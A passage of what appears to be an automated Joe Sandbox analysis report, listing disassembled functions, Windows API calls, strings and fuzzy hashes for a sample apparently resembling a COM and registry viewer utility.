Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 90ed68b3640220bc0d331cb250fa73167bd5641d75163e1709c21cbc6bcdc9be
Instruction ID: 759803a13419ed328a27a5a17149abf794de56bd233c9b4583d9f1afc0cb99c9
Opcode Fuzzy Hash: 90ed68b3640220bc0d331cb250fa73167bd5641d75163e1709c21cbc6bcdc9be
Instruction Fuzzy Hash: 3EC02B33040308B7DB210F41DC05F823F29E785721F114010F3080C0B087B3A472D694

Function 00D355E4 Relevance: 1.5, APIs: 1, Instructions: 10windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001102,00000000,00000003), ref: 00D355F7

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7070fdff95c4eea358cb4ae674faf1bffcb84b32e075fd0ee888bcb57168b22e
Instruction ID: bc50b1009ff4f7c77a2423e2c72037df68bf458fbc6c8afa17654bd01d2a20c8
Opcode Fuzzy Hash: 7070fdff95c4eea358cb4ae674faf1bffcb84b32e075fd0ee888bcb57168b22e
Instruction Fuzzy Hash: 0CC04C37040608BBDF025F91DC09CC57F6AFB99762B51C011F6584917187B399B2EB90

Function 00D37F0B Relevance: 1.5, APIs: 1, Instructions: 10windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,00D34852), ref: 00D37F1D

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 42535484fab717aca43a7a32627a2d6fdf4f98e7cdd58af38055652fe246bf23
Instruction ID: 950200d3a8905bef2ada00c38db5c80ee92d2e4214aa1e4cdd752e2040d68f58
Opcode Fuzzy Hash: 42535484fab717aca43a7a32627a2d6fdf4f98e7cdd58af38055652fe246bf23
Instruction Fuzzy Hash: AFC02B33080308BBDB001F41DC05FC17F2AE795721F518010F3180C0B087B3A872D694

Non-executed Functions

Function 00D39634 Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 469registrystringwindowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D3963E
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,0000009C,00D3ACE5,?,?), ref: 00D3966E
RegEnumValueW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,?), ref: 00D397A0
wsprintfW.USER32 ref: 00D39854
wsprintfW.USER32 ref: 00D3986C
wsprintfW.USER32 ref: 00D39925
wsprintfW.USER32 ref: 00D3993B
lstrcpyW.KERNEL32(?,?), ref: 00D39956
#538.MFC42U(00000000), ref: 00D3997D
#538.MFC42U(00000000,00000000), ref: 00D39996
#800.MFC42U(?,?,?,00000000,00000000), ref: 00D399D6
#800.MFC42U ref: 00D399EF
SendMessageW.USER32(?,00001132,00000000,?), ref: 00D39A0F
RegEnumValueW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,?), ref: 00D39A41
RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020019,?), ref: 00D39AB4
#538.MFC42U(00000000), ref: 00D39AC2

Part of subcall function 00D39634: memset.MSVCRT ref: 00D39884
Part of subcall function 00D39634: _itow.MSVCRT ref: 00D398C3
Part of subcall function 00D39634: lstrcpyW.KERNEL32(00000000,<cannot coerce data to string>), ref: 00D398FD
Part of subcall function 00D39634: #800.MFC42U(00000000), ref: 00D39AE7
Part of subcall function 00D39634: SendMessageW.USER32(?,00001102,00000002,00000000), ref: 00D39AFE
Part of subcall function 00D39634: RegCloseKey.ADVAPI32(?), ref: 00D39B07

RegEnumKeyW.ADVAPI32(?,00000000,00000000,?), ref: 00D39B16

Strings

%s [<no name>] = %s, xrefs: 00D3991D
%s = %s, xrefs: 00D39916
%#08X (%lu), xrefs: 00D39866
%s [%s] = %s, xrefs: 00D39933
%#04X%04X (%lu), xrefs: 00D3984E
<cannot coerce data to string>, xrefs: 00D398F7

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: wsprintf$#538#800Enum$MessageSendValuelstrcpy$CloseH_prolog3InfoOpenQuery_itowmemset
String ID: %#04X%04X (%lu)$%#08X (%lu)$%s = %s$%s [%s] = %s$%s [<no name>] = %s$<cannot coerce data to string>
API String ID: 88432742-3653656851
Opcode ID: 4a5ad051542d3604e0590af9559b102800e04ad20de5a9d1cbde6fd39a0d7c35
Instruction ID: 0f5917d962204314f77e755297e7dcfc6d2f5736ec1daba3adf14db04571e621
Opcode Fuzzy Hash: 4a5ad051542d3604e0590af9559b102800e04ad20de5a9d1cbde6fd39a0d7c35
Instruction Fuzzy Hash: 6CF15B71900209AFDF15DFA8DC96ABEBBB9EF59300F14442AF446EB291E7709941CB70

Function 00D34899 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 162stringCOMMON

Download Yara Rule

APIs

#1662.MFC42U ref: 00D348D9
#540.MFC42U ref: 00D348F3
lstrcpyW.KERNEL32(?,00000000), ref: 00D34912
CreateBindCtx.OLE32(00000000,?), ref: 00D34936
MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00D34971
#2644.MFC42U ref: 00D349D1
#2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 00D349E9
#800.MFC42U(?,00000000), ref: 00D34A19
lstrlenW.KERNEL32(?), ref: 00D34A30
#2810.MFC42U(?,Warning: MkParseDisplayName only ate up to "%s".,?), ref: 00D34A82
#2644.MFC42U ref: 00D34B42
#800.MFC42U ref: 00D34B5D

Strings

Yh#, xrefs: 00D34B62
MkParseDisplayName(... "%s" ...) failed., xrefs: 00D349DD
Warning: MkParseDisplayName only ate up to "%s"., xrefs: 00D34A76

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2644#2810#800$#1662#540BindCreateDisplayNameParselstrcpylstrlen
String ID: Yh#$MkParseDisplayName(... "%s" ...) failed.$Warning: MkParseDisplayName only ate up to "%s".
API String ID: 3470803309-3324736657
Opcode ID: 537cbd84ace86cc469663b37fa981b855b92a7eedf753fcae8a70980011ab825
Instruction ID: aef92d9e17add037fc8c555d718dbdad0fd1037ae28b615477bca3927e1df05a
Opcode Fuzzy Hash: 537cbd84ace86cc469663b37fa981b855b92a7eedf753fcae8a70980011ab825
Instruction Fuzzy Hash: C681927594122CAFCB60EFA4EC89BD9B7B5FB58311F1041E5E409A7261DB34AE84CF24

Function 00D33450 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132clipboardmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D378ED: GetFocus.USER32 ref: 00D378ED
Part of subcall function 00D378ED: #2859.MFC42U(00000000), ref: 00D378F4

Part of subcall function 00D37980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D3798C

GlobalAlloc.KERNEL32(00002002,00000200), ref: 00D33522
GlobalLock.KERNEL32(?), ref: 00D33534
StringFromGUID2.OLE32(-00000008,?,00000028), ref: 00D33553
wsprintfW.USER32 ref: 00D33650
GlobalUnlock.KERNEL32(?), ref: 00D3365F
EmptyClipboard.USER32 ref: 00D33670
SetClipboardData.USER32(0000000D,?), ref: 00D3367E
CloseClipboard.USER32 ref: 00D33684

Part of subcall function 00D378FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00D3790C

Strings

P, xrefs: 00D33624
<object classid="clsid:%s"></object>, xrefs: 00D33645

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: ClipboardGlobal$MessageSend$#2859AllocCloseDataEmptyFocusFromLockStringUnlockwsprintf
String ID: <object classid="clsid:%s"></object>$P
API String ID: 2486233384-3677239044
Opcode ID: 02fc099a72e92b50e2d7078fc9a73db262b21ad1d3082400629e412ae3421053
Instruction ID: 542c5d47d9cc214fb03f957218b201d034851fd2018f636cad74a23d445cf3ad
Opcode Fuzzy Hash: 02fc099a72e92b50e2d7078fc9a73db262b21ad1d3082400629e412ae3421053
Instruction Fuzzy Hash: AD519074A012288FEB60EF68CD45B99B7B5FF09304F0041EAE549E7251EB745E84CF22

Function 00D3DA20 Relevance: 13.6, APIs: 9, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,000000FF), ref: 00D3DA51
OpenProcessToken.ADVAPI32(00000000), ref: 00D3DA58
malloc.MSVCRT ref: 00D3DA69
GetTokenInformation.ADVAPI32(000000FF,00000002,00000000,00008000,?), ref: 00D3DA81
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D3DAA2
EqualSid.ADVAPI32(00000004,?), ref: 00D3DABD
FreeSid.ADVAPI32(00000000), ref: 00D3DAE4
free.MSVCRT ref: 00D3DAEF
CloseHandle.KERNEL32(000000FF), ref: 00D3DAFF

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: ProcessToken$AllocateCloseCurrentEqualFreeHandleInformationInitializeOpenfreemalloc
String ID:
API String ID: 4152120180-0
Opcode ID: 4df04eff4e9e0c587ec73115eb4a7efa9c2cec7f740b628340ff45131563a175
Instruction ID: 9d59bd88d780ab382d0e7c1cc3a86f27f2e8402690fbd28c2df297e113ba66b6
Opcode Fuzzy Hash: 4df04eff4e9e0c587ec73115eb4a7efa9c2cec7f740b628340ff45131563a175
Instruction Fuzzy Hash: 7C314D35A05319AFDB20DFA4ED89BAEBBB9FF15711F180129E511E2290D7309A45CF70

Function 00D32EF0 Relevance: 10.6, APIs: 7, Instructions: 69clipboardmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D378ED: GetFocus.USER32 ref: 00D378ED
Part of subcall function 00D378ED: #2859.MFC42U(00000000), ref: 00D378F4

Part of subcall function 00D37980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D3798C

GlobalAlloc.KERNEL32(00002002,00000080), ref: 00D32F82
GlobalLock.KERNEL32(?), ref: 00D32F8E
StringFromGUID2.OLE32(-00000008,?,00000028), ref: 00D32FA3
GlobalUnlock.KERNEL32(?), ref: 00D32FAC
EmptyClipboard.USER32 ref: 00D32FBA
SetClipboardData.USER32(0000000D,?), ref: 00D32FC5
CloseClipboard.USER32 ref: 00D32FCB

Part of subcall function 00D378FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00D3790C

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: ClipboardGlobal$MessageSend$#2859AllocCloseDataEmptyFocusFromLockStringUnlock
String ID:
API String ID: 1702833241-0
Opcode ID: c84155ffe676f50c0502fdded5c9b4241b125ace2bef5decf7f85e70c14743ce
Instruction ID: 6a3f9d20767d552059573cf863fc69f74dcb1b15e63ac2298c898eb6f67970e3
Opcode Fuzzy Hash: c84155ffe676f50c0502fdded5c9b4241b125ace2bef5decf7f85e70c14743ce
Instruction Fuzzy Hash: 93211674D00208EFDF24EFA4D84A7ADBBB4EF44305F144169E511A62A1EB748E41CF71

Function 00D3C9DB Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56eeba86a34da52e6a1b1aee2313bcf8869fc62b5097d154128e50685821ccd
Instruction ID: 6f1c78ebfec6494d8d478fad2c758b2308edcbc062f5da915a03bb33b4ebefad
Opcode Fuzzy Hash: d56eeba86a34da52e6a1b1aee2313bcf8869fc62b5097d154128e50685821ccd
Instruction Fuzzy Hash: 3021B47B52021AEBD714DB94DC45BBEB7A8EB00350F25512AF942FB290EB74DD409BB0

Function 00D3FE37 Relevance: 9.1, APIs: 6, Instructions: 74COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D3FE45
memset.MSVCRT ref: 00D3FE6B
memset.MSVCRT ref: 00D3FEF5
IsDebuggerPresent.KERNEL32 ref: 00D3FF11
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D3FF31
UnhandledExceptionFilter.KERNEL32(?), ref: 00D3FF3B

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
String ID:
API String ID: 1045392073-0
Opcode ID: 2e128354d73440572cc22cb61918aef829aae8b0f92697203aeedf678cdd6330
Instruction ID: 9f0b91afeeba5d94d2336dddb879d73d49651c238ab4faf7ccf44a43d005ffdf
Opcode Fuzzy Hash: 2e128354d73440572cc22cb61918aef829aae8b0f92697203aeedf678cdd6330
Instruction Fuzzy Hash: CF311A75D0531C9BDB10EFA4D989BCCBBB8BF18300F1041AAE50DAB250EB719A848F55

Function 00D3FCE5 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00D3FD12
GetCurrentProcessId.KERNEL32 ref: 00D3FD21
GetCurrentThreadId.KERNEL32 ref: 00D3FD2A
GetTickCount.KERNEL32 ref: 00D3FD33
QueryPerformanceCounter.KERNEL32(?), ref: 00D3FD48

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 868bbb758c6d957a3039e987fba2fa0bceb481faa8c9c184b4a7f77874279614
Instruction ID: ea41c7dcef20c191bff5c982c76c1585f1691b95a77f711f03075fb2dd4e819c
Opcode Fuzzy Hash: 868bbb758c6d957a3039e987fba2fa0bceb481faa8c9c184b4a7f77874279614
Instruction Fuzzy Hash: 78110379D01708ABCB10DFB8E94969EBBF4FF59311F65486AE402E7314E7319B808B60

Function 6E2F1865 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6E2F1871
IsDebuggerPresent.KERNEL32 ref: 6E2F193D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E2F1956
UnhandledExceptionFilter.KERNEL32(?), ref: 6E2F1960

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: dc1d44efaea059b5675f3217e85a11a1c4c440e93a7873ae778449fa5cc4dd4e
Instruction ID: f5043e1d5035fa2be3c6e3f754e58153c9da9c637aaf912d832d74659ee83631
Opcode Fuzzy Hash: dc1d44efaea059b5675f3217e85a11a1c4c440e93a7873ae778449fa5cc4dd4e
Instruction Fuzzy Hash: 4731F4B5D4121DDBEF20DFA0D9497CDBBB8AF08304F1045AAE40DAB244E7719A85CF44

Function 00D3F4CC Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00D3F602,00D29E34), ref: 00D3F4D3
UnhandledExceptionFilter.KERNEL32(00D3F602,?,00D3F602,00D29E34), ref: 00D3F4DC
GetCurrentProcess.KERNEL32(C0000409,?,00D3F602,00D29E34), ref: 00D3F4E7
TerminateProcess.KERNEL32(00000000,?,00D3F602,00D29E34), ref: 00D3F4EE

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 5497a1b483d57b49d58c0a9cb8bf5c3e5348ca042869c8e78f8c717384fd9161
Instruction ID: 7a91414a500de18b9c86c484fdf7d04dd833d51b2436e911b725c2b6134e970a
Opcode Fuzzy Hash: 5497a1b483d57b49d58c0a9cb8bf5c3e5348ca042869c8e78f8c717384fd9161
Instruction Fuzzy Hash: 73D0CA3A000308ABCB002FE1EC0EB4D3E28EBAA216F064400F30AE3624DA3188C18B71

Function 6E2F5312 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E2F540A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E2F5414
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E2F5421

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f99ae7631f66527d7e277960767ef1733075aadf863ec9d6706a1148503cada5
Instruction ID: 2a772fa2211b4eecff716ebd67e53c1097ce4ce754a5a380a5cf11fc2955958b
Opcode Fuzzy Hash: f99ae7631f66527d7e277960767ef1733075aadf863ec9d6706a1148503cada5
Instruction Fuzzy Hash: A131C1B594122DDBCB21DF64D8887C9BBB9BF08310F5045EAE41CA7260EB709B85CF44

Function 00D3C7BB Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,0000000C,00000000,0000000C,00000001,?,00000000,00000001,?,?,00D3BA07,System,00000001,00000000), ref: 00D3C7E2
GetLastError.KERNEL32(?,00D3BA07,System,00000001,00000000), ref: 00D3C7EC

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: DaclDescriptorErrorLastSecurity
String ID:
API String ID: 914054853-0
Opcode ID: 3a471d384490837d4742fb9b5658ab570af4f6bcbb0a067d5127f794798805bb
Instruction ID: d6e69c33d3e76d8c2283031c65534fe770b54742c2e40d62e389e6cf79823416
Opcode Fuzzy Hash: 3a471d384490837d4742fb9b5658ab570af4f6bcbb0a067d5127f794798805bb
Instruction Fuzzy Hash: 26F08C3761023ABBDB211A959C45F46BB29EF407B4F114122FE04EB250DA63DC2087F0

Function 6E2FE135 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E2FE130,?,?,00000008,?,?,6E2FDD33,00000000), ref: 6E2FE362

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 42aa50bfc78c4a0870ae84f11cba075d1addef07fbdb4b3fff58d36140f9a632
Instruction ID: caf70c41af6ec8858d4fcdc9224af06bf356aee9f3d29834a58ec8779ceed6f0
Opcode Fuzzy Hash: 42aa50bfc78c4a0870ae84f11cba075d1addef07fbdb4b3fff58d36140f9a632
Instruction Fuzzy Hash: 29B19E3115060ECFD706CF68C496B65BBE2FF05365F258658E8A9CF2A1C735E982CB40

Function 6E2F1A28 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E2F1A3E

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 8a6c7c06a13a57daa56283f8eceac06b826dfa64fe7e17b5862f6a785bd04dd0
Instruction ID: 29791322ab762d295bd74c4196e8bbc8c071c88b15aac87dfe4aef1a3a549412
Opcode Fuzzy Hash: 8a6c7c06a13a57daa56283f8eceac06b826dfa64fe7e17b5862f6a785bd04dd0
Instruction Fuzzy Hash: 3851D8F1A6460ACFEB44CFA4C4913AEBBF6FB09301F20816AC402EB245E7709985CF50

Function 6E2F6CE9 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4910fb9fa291ebda4c08f029d9e1047edc619c9284fa67529ebf3fbe78c47106
Instruction ID: 2f424c4f53d7282956a64c7164746621e9204b7afb726c18279d18b9c4526af6
Opcode Fuzzy Hash: 4910fb9fa291ebda4c08f029d9e1047edc619c9284fa67529ebf3fbe78c47106
Instruction Fuzzy Hash: 6341A2B585421DAFDB108FA8CCD8AEAFBBAEF45304F1442D9E41993200DA319E458F60

Function 00D3FAC0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001FA70), ref: 00D3FAC5

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8f64c9acc2bbb23b9e85ff0fd13a4d20f488d73efd6d9318c143c19461cffc5d
Instruction ID: 62ef9e3a5582528c1ae595f25d476342509a80cd7edbe1920142f4abfa4988e2
